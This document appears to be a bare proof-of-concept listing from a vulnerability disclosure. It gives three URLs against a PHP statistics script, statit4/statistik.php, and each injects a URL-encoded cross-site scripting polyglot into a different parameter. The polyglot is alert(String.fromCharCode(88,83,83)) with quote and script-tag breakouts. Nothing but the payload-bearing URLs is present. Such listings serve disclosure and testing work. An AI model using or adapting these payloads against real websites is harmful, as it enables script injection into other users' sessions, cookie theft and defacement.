http://www.example.com/statit4/statistik.php?st_id=1&action=stat_last%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&enc=333263120212292&agent=ari/534.30&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace
http://www.example.com/statit4/statistik.php?action=stat_tld&st_id=1&show=more%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E\&PHPSESSID=d8679fc904017bdf6b09f5d88f7cf979
http://www.example.com/statit4/statistik.php?action=stat_abfragen&st_id=1&show=more&order=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&sort=1&PHPSESSID=698bf9d1e988e3af70022f1dfb86fd33